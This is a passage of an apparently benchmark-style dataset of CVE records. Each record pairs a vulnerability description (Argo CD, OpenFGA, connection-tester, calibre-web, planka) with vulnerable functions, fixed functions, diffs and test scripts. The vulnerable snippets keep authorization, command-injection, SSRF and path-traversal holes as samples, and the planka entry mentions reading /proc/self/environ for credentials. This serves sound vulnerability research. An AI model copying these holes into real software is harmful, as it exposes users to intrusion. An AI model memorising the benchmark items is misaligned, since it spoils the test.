"256d90178b11b04bc8174d08d7b663a2a7b1771b", "file_path": "server/settings/settings.go", "start_line": 39, "end_line": 148, "snippet": "func (s *Server) Get(ctx context.Context, q *settingspkg.SettingsQuery) (*settingspkg.Settings, error) {\n\tresourceOverrides, err := s.mgr.GetResourceOverrides()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\toverrides := make(map[string]*v1alpha1.ResourceOverride)\n\tfor k := range resourceOverrides {\n\t\tval := resourceOverrides[k]\n\t\toverrides[k] = &val\n\t}\n\tappInstanceLabelKey, err := s.mgr.GetAppInstanceLabelKey()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\targoCDSettings, err := s.mgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tgaSettings, err := s.mgr.GetGoogleAnalytics()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\thelp, err := s.mgr.GetHelp()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tuserLoginsDisabled := true\n\taccounts, err := s.mgr.GetAccounts()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, account := range accounts {\n\t\tif account.Enabled && account.HasCapability(settings.AccountCapabilityLogin) {\n\t\t\tuserLoginsDisabled = false\n\t\t\tbreak\n\t\t}\n\t}\n\n\tkustomizeSettings, err := s.mgr.GetKustomizeSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar kustomizeVersions []string\n\tfor i := range kustomizeSettings.Versions {\n\t\tkustomizeVersions = append(kustomizeVersions, kustomizeSettings.Versions[i].Name)\n\t}\n\n\ttrackingMethod, err := s.mgr.GetTrackingMethod()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tset := settingspkg.Settings{\n\t\tURL: argoCDSettings.URL,\n\t\tAppLabelKey: appInstanceLabelKey,\n\t\tResourceOverrides: overrides,\n\t\tStatusBadgeEnabled: argoCDSettings.StatusBadgeEnabled,\n\t\tStatusBadgeRootUrl: argoCDSettings.StatusBadgeRootUrl,\n\t\tKustomizeOptions: &v1alpha1.KustomizeOptions{\n\t\t\tBuildOptions: argoCDSettings.KustomizeBuildOptions,\n\t\t},\n\t\tGoogleAnalytics: &settingspkg.GoogleAnalyticsConfig{\n\t\t\tTrackingID: gaSettings.TrackingID,\n\t\t\tAnonymizeUsers: gaSettings.AnonymizeUsers,\n\t\t},\n\t\tHelp: &settingspkg.Help{\n\t\t\tChatUrl: help.ChatURL,\n\t\t\tChatText: help.ChatText,\n\t\t\tBinaryUrls: help.BinaryURLs,\n\t\t},\n\t\tUserLoginsDisabled: userLoginsDisabled,\n\t\tKustomizeVersions: kustomizeVersions,\n\t\tUiCssURL: argoCDSettings.UiCssURL,\n\t\tTrackingMethod: trackingMethod,\n\t\tExecEnabled: argoCDSettings.ExecEnabled,\n\t\tAppsInAnyNamespaceEnabled: s.appsInAnyNamespaceEnabled,\n\t}\n\n\tif sessionmgr.LoggedIn(ctx) || s.disableAuth {\n\t\tset.UiBannerContent = argoCDSettings.UiBannerContent\n\t\tset.UiBannerURL = argoCDSettings.UiBannerURL\n\t\tset.UiBannerPermanent = argoCDSettings.UiBannerPermanent\n\t\tset.UiBannerPosition = argoCDSettings.UiBannerPosition\n\t\tset.ControllerNamespace = s.mgr.GetNamespace()\n\t}\n\tif sessionmgr.LoggedIn(ctx) {\n\t\tset.PasswordPattern = argoCDSettings.PasswordPattern\n\t}\n\tif argoCDSettings.DexConfig != \"\" {\n\t\tvar cfg settingspkg.DexConfig\n\t\terr = yaml.Unmarshal([]byte(argoCDSettings.DexConfig), &cfg)\n\t\tif err == nil {\n\t\t\tset.DexConfig = &cfg\n\t\t}\n\t}\n\tif oidcConfig := argoCDSettings.OIDCConfig(); oidcConfig != nil {\n\t\tset.OIDCConfig = &settingspkg.OIDCConfig{\n\t\t\tName: oidcConfig.Name,\n\t\t\tIssuer: oidcConfig.Issuer,\n\t\t\tClientID: oidcConfig.ClientID,\n\t\t\tCLIClientID: oidcConfig.CLIClientID,\n\t\t\tScopes: oidcConfig.RequestedScopes,\n\t\t\tEnablePKCEAuthentication: oidcConfig.EnablePKCEAuthentication,\n\t\t}\n\t\tif len(argoCDSettings.OIDCConfig().RequestedIDTokenClaims) > 0 {\n\t\t\tset.OIDCConfig.IDTokenClaims = argoCDSettings.OIDCConfig().RequestedIDTokenClaims\n\t\t}\n\t}\n\treturn &set, nil\n}"}], "vul_patch": "--- a/server/settings/settings.go\n+++ b/server/settings/settings.go\n@@ -71,7 +71,6 @@\n \t\tUserLoginsDisabled: userLoginsDisabled,\n \t\tKustomizeVersions: kustomizeVersions,\n \t\tUiCssURL: argoCDSettings.UiCssURL,\n-\t\tPasswordPattern: argoCDSettings.PasswordPattern,\n \t\tTrackingMethod: trackingMethod,\n \t\tExecEnabled: argoCDSettings.ExecEnabled,\n \t\tAppsInAnyNamespaceEnabled: s.appsInAnyNamespaceEnabled,\n@@ -83,6 +82,9 @@\n \t\tset.UiBannerPermanent = argoCDSettings.UiBannerPermanent\n \t\tset.UiBannerPosition = argoCDSettings.UiBannerPosition\n \t\tset.ControllerNamespace = s.mgr.GetNamespace()\n+\t}\n+\tif sessionmgr.LoggedIn(ctx) {\n+\t\tset.PasswordPattern = argoCDSettings.PasswordPattern\n \t}\n \tif argoCDSettings.DexConfig != \"\" {\n \t\tvar cfg settingspkg.DexConfig\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-39342", "cve_description": "OpenFGA is an authorization/permission engine. Versions prior to version 0.2.4 are vulnerable to authorization bypass under certain conditions. Users whose model has a relation defined as a tupleset (the right hand side of a \u2018from\u2019 statement) that involves anything other than a direct relationship (e.g. \u2018as self\u2019) are vulnerable. Version 0.2.4 contains a patch for this issue.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/openfga/openfga", "patch_url": ["https://github.com/openfga/openfga/commit/c8db1ee3d2a366f18e585dd33236340e76e784c4"], "programing_language": "Go", "vul_func": [{"id": "vul_go_125_1", "commit": "b466769", "file_path": "pkg/typesystem/typesystem.go", "start_line": 233, "end_line": 258, "snippet": "func validateRelationRewrites(model *openfgapb.AuthorizationModel) error {\n\ttypeDefinitions := model.GetTypeDefinitions()\n\n\tallRelations := map[string]struct{}{}\n\ttypeToRelations := map[string]map[string]struct{}{}\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\t\ttypeToRelations[objectType] = map[string]struct{}{}\n\t\tfor relation := range td.GetRelations() {\n\t\t\ttypeToRelations[objectType][relation] = struct{}{}\n\t\t\tallRelations[relation] = struct{}{}\n\t\t}\n\t}\n\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\t\tfor relation, rewrite := range td.GetRelations() {\n\t\t\terr := isUsersetRewriteValid(allRelations, typeToRelations[objectType], objectType, relation, rewrite)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_125_2", "commit": "b466769", "file_path": "pkg/typesystem/typesystem.go", "start_line": 262, "end_line": 313, "snippet": "func isUsersetRewriteValid(allRelations map[string]struct{}, relationsOnType map[string]struct{}, objectType, relation string, rewrite *openfgapb.Userset) error {\n\tif rewrite.GetUserset() == nil {\n\t\treturn InvalidRelationError(objectType, relation)\n\t}\n\n\tswitch t := rewrite.GetUserset().(type) {\n\tcase *openfgapb.Userset_ComputedUserset:\n\t\tcomputedUserset := t.ComputedUserset.GetRelation()\n\t\tif computedUserset == relation {\n\t\t\treturn InvalidRelationError(objectType, relation)\n\t\t}\n\t\tif _, ok := relationsOnType[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, computedUserset)\n\t\t}\n\tcase *openfgapb.Userset_TupleToUserset:\n\t\ttupleset := t.TupleToUserset.GetTupleset().GetRelation()\n\t\tif _, ok := relationsOnType[tupleset]; !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, tupleset)\n\t\t}\n\n\t\tcomputedUserset := t.TupleToUserset.GetComputedUserset().GetRelation()\n\t\tif _, ok := allRelations[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(\"\", computedUserset)\n\t\t}\n\tcase *openfgapb.Userset_Union:\n\t\tfor _, child := range t.Union.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Intersection:\n\t\tfor _, child := range t.Intersection.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Difference:\n\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Base)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Subtract)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_125_1", "commit": "c8db1ee", "file_path": "pkg/typesystem/typesystem.go", "start_line": 234, "end_line": 279, "snippet": "func validateRelationRewrites(model *openfgapb.AuthorizationModel) error {\n\ttypeDefinitions := model.GetTypeDefinitions()\n\n\trelations := map[string]*openfgapb.Relation{}\n\ttyperels := map[string]map[string]*openfgapb.Relation{}\n\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\n\t\ttyperels[objectType] = map[string]*openfgapb.Relation{}\n\n\t\tfor relation, rewrite := range td.GetRelations() {\n\t\t\trelationMetadata := td.GetMetadata().GetRelations()\n\t\t\tmd, ok := relationMetadata[relation]\n\n\t\t\tvar typeinfo *openfgapb.RelationTypeInfo\n\t\t\tif ok {\n\t\t\t\ttypeinfo = &openfgapb.RelationTypeInfo{\n\t\t\t\t\tDirectlyRelatedUserTypes: md.GetDirectlyRelatedUserTypes(),\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tr := &openfgapb.Relation{\n\t\t\t\tName: relation,\n\t\t\t\tRewrite: rewrite,\n\t\t\t\tTypeInfo: typeinfo,\n\t\t\t}\n\n\t\t\ttyperels[objectType][relation] = r\n\t\t\trelations[relation] = r\n\t\t}\n\t}\n\n\tfor _, td := range typeDefinitions {\n\t\tobjectType := td.GetType()\n\n\t\tfor relation, rewrite := range td.GetRelations() {\n\t\t\terr := isUsersetRewriteValid(relations, typerels[objectType], objectType, relation, rewrite)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_125_2", "commit": "c8db1ee", "file_path": "pkg/typesystem/typesystem.go", "start_line": 283, "end_line": 348, "snippet": "func isUsersetRewriteValid(\n\tallRelations map[string]*openfgapb.Relation,\n\trelationsOnType map[string]*openfgapb.Relation,\n\tobjectType, relation string,\n\trewrite *openfgapb.Userset,\n) error {\n\tif rewrite.GetUserset() == nil {\n\t\treturn InvalidRelationError(objectType, relation)\n\t}\n\n\tswitch t := rewrite.GetUserset().(type) {\n\tcase *openfgapb.Userset_ComputedUserset:\n\t\tcomputedUserset := t.ComputedUserset.GetRelation()\n\t\tif computedUserset == relation {\n\t\t\treturn InvalidRelationError(objectType, relation)\n\t\t}\n\t\tif _, ok := relationsOnType[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, computedUserset)\n\t\t}\n\tcase *openfgapb.Userset_TupleToUserset:\n\t\ttupleset := t.TupleToUserset.GetTupleset().GetRelation()\n\n\t\ttuplesetRelation, ok := relationsOnType[tupleset]\n\t\tif !ok {\n\t\t\treturn RelationDoesNotExistError(objectType, tupleset)\n\t\t}\n\n\t\t// tupleset relations must only be direct relationships, no rewrites\n\t\t// are allowed on them\n\t\ttuplesetRewrite := tuplesetRelation.GetRewrite()\n\t\tif reflect.TypeOf(tuplesetRewrite.GetUserset()) != reflect.TypeOf(&openfgapb.Userset_This{}) {\n\t\t\treturn errors.Errorf(\"the '%s#%s' relation is referenced in at least one tupleset and thus must be a direct relation\", objectType, tupleset)\n\t\t}\n\n\t\tcomputedUserset := t.TupleToUserset.GetComputedUserset().GetRelation()\n\t\tif _, ok := allRelations[computedUserset]; !ok {\n\t\t\treturn RelationDoesNotExistError(\"\", computedUserset)\n\t\t}\n\tcase *openfgapb.Userset_Union:\n\t\tfor _, child := range t.Union.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Intersection:\n\t\tfor _, child := range t.Intersection.GetChild() {\n\t\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, child)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\tcase *openfgapb.Userset_Difference:\n\t\terr := isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Base)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\terr = isUsersetRewriteValid(allRelations, relationsOnType, objectType, relation, t.Difference.Subtract)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/typesystem/typesystem.go\n+++ b/pkg/typesystem/typesystem.go\n@@ -1,21 +1,41 @@\n func validateRelationRewrites(model *openfgapb.AuthorizationModel) error {\n \ttypeDefinitions := model.GetTypeDefinitions()\n \n-\tallRelations := map[string]struct{}{}\n-\ttypeToRelations := map[string]map[string]struct{}{}\n+\trelations := map[string]*openfgapb.Relation{}\n+\ttyperels := map[string]map[string]*openfgapb.Relation{}\n+\n \tfor _, td := range typeDefinitions {\n \t\tobjectType := td.GetType()\n-\t\ttypeToRelations[objectType] = map[string]struct{}{}\n-\t\tfor relation := range td.GetRelations() {\n-\t\t\ttypeToRelations[objectType][relation] = struct{}{}\n-\t\t\tallRelations[relation] = struct{}{}\n+\n+\t\ttyperels[objectType] = map[string]*openfgapb.Relation{}\n+\n+\t\tfor relation, rewrite := range td.GetRelations() {\n+\t\t\trelationMetadata := td.GetMetadata().GetRelations()\n+\t\t\tmd, ok := relationMetadata[relation]\n+\n+\t\t\tvar typeinfo *openfgapb.RelationTypeInfo\n+\t\t\tif ok {\n+\t\t\t\ttypeinfo = &openfgapb.RelationTypeInfo{\n+\t\t\t\t\tDirectlyRelatedUserTypes: md.GetDirectlyRelatedUserTypes(),\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\tr := &openfgapb.Relation{\n+\t\t\t\tName: relation,\n+\t\t\t\tRewrite: rewrite,\n+\t\t\t\tTypeInfo: typeinfo,\n+\t\t\t}\n+\n+\t\t\ttyperels[objectType][relation] = r\n+\t\t\trelations[relation] = r\n \t\t}\n \t}\n \n \tfor _, td := range typeDefinitions {\n \t\tobjectType := td.GetType()\n+\n \t\tfor relation, rewrite := range td.GetRelations() {\n-\t\t\terr := isUsersetRewriteValid(allRelations, typeToRelations[objectType], objectType, relation, rewrite)\n+\t\t\terr := isUsersetRewriteValid(relations, typerels[objectType], objectType, relation, rewrite)\n \t\t\tif err != nil {\n \t\t\t\treturn err\n \t\t\t}\n\n--- a/pkg/typesystem/typesystem.go\n+++ b/pkg/typesystem/typesystem.go\n@@ -1,4 +1,9 @@\n-func isUsersetRewriteValid(allRelations map[string]struct{}, relationsOnType map[string]struct{}, objectType, relation string, rewrite *openfgapb.Userset) error {\n+func isUsersetRewriteValid(\n+\tallRelations map[string]*openfgapb.Relation,\n+\trelationsOnType map[string]*openfgapb.Relation,\n+\tobjectType, relation string,\n+\trewrite *openfgapb.Userset,\n+) error {\n \tif rewrite.GetUserset() == nil {\n \t\treturn InvalidRelationError(objectType, relation)\n \t}\n@@ -14,8 +19,17 @@\n \t\t}\n \tcase *openfgapb.Userset_TupleToUserset:\n \t\ttupleset := t.TupleToUserset.GetTupleset().GetRelation()\n-\t\tif _, ok := relationsOnType[tupleset]; !ok {\n+\n+\t\ttuplesetRelation, ok := relationsOnType[tupleset]\n+\t\tif !ok {\n \t\t\treturn RelationDoesNotExistError(objectType, tupleset)\n+\t\t}\n+\n+\t\t// tupleset relations must only be direct relationships, no rewrites\n+\t\t// are allowed on them\n+\t\ttuplesetRewrite := tuplesetRelation.GetRewrite()\n+\t\tif reflect.TypeOf(tuplesetRewrite.GetUserset()) != reflect.TypeOf(&openfgapb.Userset_This{}) {\n+\t\t\treturn errors.Errorf(\"the '%s#%s' relation is referenced in at least one tupleset and thus must be a direct relation\", objectType, tupleset)\n \t\t}\n \n \t\tcomputedUserset := t.TupleToUserset.GetComputedUserset().GetRelation()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7781", "cve_description": "This affects the package connection-tester before 0.2.1. The injection point is located in line 15 in index.js. The following PoC demonstrates the vulnerability:", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/skoranga/node-connection-tester", "patch_url": ["https://github.com/skoranga/node-connection-tester/commit/c1dc374138e1a9d3361c4b8e1ddb1a81d4b45bee"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_28_1", "commit": "7d7b7112d4bfe5a711b292fa046edd57e9da9266", "file_path": "index.js", "start_line": 78, "end_line": 95, "snippet": " test: function ConnectionTester(host, port, callbackOrConnectTimeout, callback) {\n\n // for backward compatibility\n if (typeof callbackOrConnectTimeout === 'function') {\n console.log('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n return testAsync(host, port, SOCKET_TIMEOUT, callbackOrConnectTimeout);\n }\n if (typeof callbackOrConnectTimeout === 'number') {\n if (callback) {\n return testAsync(host, port, callbackOrConnectTimeout, callback);\n } else {\n return testSync(host, port, callbackOrConnectTimeout);\n }\n }\n if (callbackOrConnectTimeout === undefined) {\n return testSync(host, port, SOCKET_TIMEOUT);\n }\n }"}], "fix_func": [{"id": "fix_js_28_1", "commit": "c1dc374138e1a9d3361c4b8e1ddb1a81d4b45bee", "file_path": "index.js", "start_line": 85, "end_line": 128, "snippet": " test: function ConnectionTester(host, port, connectTimeout, callback) {\n\n // validate host\n if (!isValidHostNameOrIP(host)) {\n console.error('[connection-tester] invalid host: ', host);\n host = undefined;\n }\n // validate port\n var originalPort = port;\n port = +port;\n if (!port || port < 0 || port > 65535) {\n console.error('[connection-tester] invalid port: ', originalPort);\n port = undefined;\n }\n\n if (typeof connectTimeout === 'function') {\n console.error('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n callback = connectTimeout;\n connectTimeout = SOCKET_TIMEOUT;\n }\n if (connectTimeout === undefined) {\n connectTimeout = SOCKET_TIMEOUT;\n }\n\n if (typeof connectTimeout === 'number') {\n if (!port || !host) {\n var output = {\n success: false,\n error: 'invalid host/port'\n };\n\n if (callback) {\n return callback(null, output);\n } else {\n return output;\n }\n }\n if (callback) {\n return testAsync(host, port, connectTimeout, callback);\n } else {\n return testSync(host, port, connectTimeout);\n }\n }\n }"}, {"id": "fix_js_28_2", "commit": "c1dc374138e1a9d3361c4b8e1ddb1a81d4b45bee", "file_path": "index.js", "start_line": 10, "end_line": 15, "snippet": "//source - http://stackoverflow.com/questions/106179/regular-expression-to-match-dns-hostname-or-ip-address\nvar ValidHostnameRegex = new RegExp(\"^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]*[a-zA-Z0-9])\\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\\-]*[A-Za-z0-9])$\");\n\nfunction isValidHostNameOrIP(host) {\n return net.isIP(host) || ValidHostnameRegex.test(host);\n}"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,18 +1,44 @@\n- test: function ConnectionTester(host, port, callbackOrConnectTimeout, callback) {\n+ test: function ConnectionTester(host, port, connectTimeout, callback) {\n \n- // for backward compatibility\n- if (typeof callbackOrConnectTimeout === 'function') {\n- console.log('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n- return testAsync(host, port, SOCKET_TIMEOUT, callbackOrConnectTimeout);\n+ // validate host\n+ if (!isValidHostNameOrIP(host)) {\n+ console.error('[connection-tester] invalid host: ', host);\n+ host = undefined;\n }\n- if (typeof callbackOrConnectTimeout === 'number') {\n+ // validate port\n+ var originalPort = port;\n+ port = +port;\n+ if (!port || port < 0 || port > 65535) {\n+ console.error('[connection-tester] invalid port: ', originalPort);\n+ port = undefined;\n+ }\n+\n+ if (typeof connectTimeout === 'function') {\n+ console.error('deprecated: Please migrate to the new interface ConnectionTester\\(host, port, timeout, callback\\)');\n+ callback = connectTimeout;\n+ connectTimeout = SOCKET_TIMEOUT;\n+ }\n+ if (connectTimeout === undefined) {\n+ connectTimeout = SOCKET_TIMEOUT;\n+ }\n+\n+ if (typeof connectTimeout === 'number') {\n+ if (!port || !host) {\n+ var output = {\n+ success: false,\n+ error: 'invalid host/port'\n+ };\n+\n+ if (callback) {\n+ return callback(null, output);\n+ } else {\n+ return output;\n+ }\n+ }\n if (callback) {\n- return testAsync(host, port, callbackOrConnectTimeout, callback);\n+ return testAsync(host, port, connectTimeout, callback);\n } else {\n- return testSync(host, port, callbackOrConnectTimeout);\n+ return testSync(host, port, connectTimeout);\n }\n }\n- if (callbackOrConnectTimeout === undefined) {\n- return testSync(host, port, SOCKET_TIMEOUT);\n- }\n }\n\n--- /dev/null\n+++ b/index.js\n@@ -0,0 +1,6 @@\n+//source - http://stackoverflow.com/questions/106179/regular-expression-to-match-dns-hostname-or-ip-address\n+var ValidHostnameRegex = new RegExp(\"^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]*[a-zA-Z0-9])\\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\\-]*[A-Za-z0-9])$\");\n+\n+function isValidHostNameOrIP(host) {\n+ return net.isIP(host) || ValidHostnameRegex.test(host);\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7781:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-connection-tester\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7781:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-connection-tester\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpx mocha --grep \"should connect to localhost|should return false while connecting to 5678 port on www.example.com|should connect to localhost|should connect to www.yahoo.com 80|should return false while connecting to dead port on localhost\""} {"cve_id": "CVE-2022-0766", "cve_description": "Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/janeczku/calibre-web", "patch_url": ["https://github.com/janeczku/calibre-web/commit/965352c8d96c9eae7a6867ff76b0db137d04b0b8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_214_1", "commit": "8007e45", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "fix_func": [{"id": "fix_py_214_1", "commit": "965352c", "file_path": "cps/helper.py", "start_line": 732, "end_line": 751, "snippet": "def save_cover_from_url(url, book_path):\n try:\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n requests.exceptions.HTTPError,\n requests.exceptions.ConnectionError,\n requests.exceptions.Timeout) as ex:\n log.info(u'Cover Download Error %s', ex)\n return False, _(\"Error Downloading Cover\")\n except MissingDelegateError as ex:\n log.info(u'File Format Error %s', ex)\n return False, _(\"Cover Format Error\")"}], "vul_patch": "--- a/cps/helper.py\n+++ b/cps/helper.py\n@@ -3,10 +3,10 @@\n if not cli.allow_localhost:\n # 127.0.x.x, localhost, [::1], [::ffff:7f00:1]\n ip = socket.getaddrinfo(urlparse(url).hostname, 0)[0][4][0]\n- if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\":\n+ if ip.startswith(\"127.\") or ip.startswith('::ffff:7f') or ip == \"::1\" or ip == \"0.0.0.0\" or ip == \"::\":\n log.error(\"Localhost was accessed for cover upload\")\n return False, _(\"You are not allowed to access localhost for cover uploads\")\n- img = requests.get(url, timeout=(10, 200)) # ToDo: Error Handling\n+ img = requests.get(url, timeout=(10, 200), allow_redirects=False) # ToDo: Error Handling\n img.raise_for_status()\n return save_cover(img, book_path)\n except (socket.gaierror,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-2653", "cve_description": "With this vulnerability an attacker can read many sensitive files like configuration files, or the /proc/self/environ file, that contains the environment variable used by the web server that includes database credentials. If the web server user is root, an attacker will be able to read any file in the system.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/plankanban/planka", "patch_url": ["https://github.com/plankanban/planka/commit/ac1df5201dfdaf68d37f7e1b272bc137870d7418"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_249_1", "commit": "fbe24c0", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 10, "end_line": 21, "snippet": "module.exports = {\n inputs: {\n id: {\n type: 'string',\n regex: /^[0-9]+$/,\n required: true,\n },\n filename: {\n type: 'string',\n required: true,\n },\n },"}, {"id": "vul_js_249_2", "commit": "fbe24c0", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 29, "end_line": 69, "snippet": " async fn(inputs, exits) {\n const { currentUser } = this.req;\n\n const { attachment, card, project } = await sails.helpers.attachments\n .getProjectPath(inputs.id)\n .intercept('pathNotFound', () => Errors.ATTACHMENT_NOT_FOUND);\n\n const isBoardMember = await sails.helpers.users.isBoardMember(currentUser.id, card.boardId);\n\n if (!isBoardMember) {\n const isProjectManager = await sails.helpers.users.isProjectManager(\n currentUser.id,\n project.id,\n );\n\n if (!isProjectManager) {\n throw Errors.ATTACHMENT_NOT_FOUND; // Forbidden\n }\n }\n\n if (!attachment.image) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n const filePath = path.join(\n sails.config.custom.attachmentsPath,\n attachment.dirname,\n 'thumbnails',\n inputs.filename,\n );\n\n if (!fs.existsSync(filePath)) {\n throw Errors.ATTACHMENT_NOT_FOUND;\n }\n\n this.res.type(attachment.filename);\n this.res.set('Cache-Control', 'private, max-age=900'); // TODO: move to config\n\n return exits.success(fs.createReadStream(filePath));\n },\n};"}, {"id": "vul_js_249_3", "commit": "fbe24c0", "file_path": "server/config/routes.js", "start_line": 83, "end_line": 86, "snippet": " 'GET /attachments/:id/download/thumbnails/:filename': {\n action: 'attachments/download-thumbnail',\n skipAssets: false,\n },"}], "fix_func": [{"id": "fix_js_249_1", "commit": "ac1df5201dfdaf68d37f7e1b272bc137870d7418", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 10, "end_line": 17, "snippet": "module.exports = {\n inputs: {\n id: {\n type: 'string',\n regex: /^[0-9]+$/,\n required: true,\n },\n },"}, {"id": "fix_js_249_2", "commit": "ac1df5201dfdaf68d37f7e1b272bc137870d7418", "file_path": "server/api/controllers/attachments/download-thumbnail.js", "start_line": 25, "end_line": 65, "snippet": " async fn(inputs, exits) {\n const { currentUser } = this.req;\n\n const { attachment, card, project } = await sails.helpers.attachments\n .getProjectPath(inputs.id)\n .intercept('pathNotFound', () => 